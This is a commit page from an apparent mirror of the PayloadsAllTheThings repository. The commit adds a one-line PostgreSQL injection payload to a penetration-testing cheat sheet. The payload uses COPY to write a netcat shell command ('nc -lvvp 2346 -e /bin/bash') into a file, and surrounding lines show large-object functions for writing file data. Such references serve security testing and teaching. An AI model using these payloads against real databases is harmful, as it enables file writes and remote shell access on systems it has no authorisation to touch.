1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-04-26 03:25:09 +02:00

Add a one line postgres file write

This commit is contained in:
Karim Kanso 2021-01-30 14:17:35 +00:00 committed by GitHub
parent 092083af5c
commit 826130946c
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -184,6 +184,11 @@ SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';
```
Or as one line:
```sql
COPY (SELECT 'nc -lvvp 2346 -e /bin/bash') TO '/tmp/pentestlab';
```
```sql
SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data
SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20